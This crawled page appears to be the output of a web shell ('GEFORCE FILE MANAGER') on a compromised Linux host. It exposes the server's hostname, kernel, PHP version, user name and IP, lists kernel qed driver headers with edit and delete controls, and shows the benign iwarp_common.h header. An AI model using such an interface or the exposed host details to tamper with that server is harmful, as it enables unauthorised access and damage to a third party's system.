[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.56.1.el8_10.x86_64
/
include
/
linux
/
qed
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 common_hsi.h
50,147 B
SET
[ EDIT ]
|
[ DEL ]
📄 eth_common.h
14,538 B
SET
[ EDIT ]
|
[ DEL ]
📄 fcoe_common.h
24,842 B
SET
[ EDIT ]
|
[ DEL ]
📄 iscsi_common.h
48,815 B
SET
[ EDIT ]
|
[ DEL ]
📄 iwarp_common.h
852 B
SET
[ EDIT ]
|
[ DEL ]
📄 nvmetcp_common.h
18,277 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_chain.h
16,929 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_eth_if.h
9,353 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_fcoe_if.h
4,223 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_if.h
34,849 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_iov_if.h
930 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_iscsi_if.h
6,069 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_ll2_if.h
6,304 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_nvmetcp_if.h
7,511 B
SET
[ EDIT ]
|
[ DEL ]
📄 qed_rdma_if.h
18,347 B
SET
[ EDIT ]
|
[ DEL ]
📄 qede_rdma.h
1,930 B
SET
[ EDIT ]
|
[ DEL ]
📄 rdma_common.h
1,243 B
SET
[ EDIT ]
|
[ DEL ]
📄 roce_common.h
1,265 B
SET
[ EDIT ]
|
[ DEL ]
📄 storage_common.h
3,853 B
SET
[ EDIT ]
|
[ DEL ]
📄 tcp_common.h
6,808 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: iwarp_common.h
/* SPDX-License-Identifier: (GPL-2.0-only OR BSD-3-Clause) */ /* QLogic qed NIC Driver * Copyright (c) 2015-2017 QLogic Corporation * Copyright (c) 2019-2020 Marvell International Ltd. */ #ifndef __IWARP_COMMON__ #define __IWARP_COMMON__ #include <linux/qed/rdma_common.h> /************************/ /* IWARP FW CONSTANTS */ /************************/ #define IWARP_ACTIVE_MODE 0 #define IWARP_PASSIVE_MODE 1 #define IWARP_SHARED_QUEUE_PAGE_SIZE (0x8000) #define IWARP_SHARED_QUEUE_PAGE_RQ_PBL_OFFSET (0x4000) #define IWARP_SHARED_QUEUE_PAGE_RQ_PBL_MAX_SIZE (0x1000) #define IWARP_SHARED_QUEUE_PAGE_SQ_PBL_OFFSET (0x5000) #define IWARP_SHARED_QUEUE_PAGE_SQ_PBL_MAX_SIZE (0x3000) #define IWARP_REQ_MAX_INLINE_DATA_SIZE (128) #define IWARP_REQ_MAX_SINGLE_SQ_WQE_SIZE (176) #define IWARP_MAX_QPS (64 * 1024) #endif /* __IWARP_COMMON__ */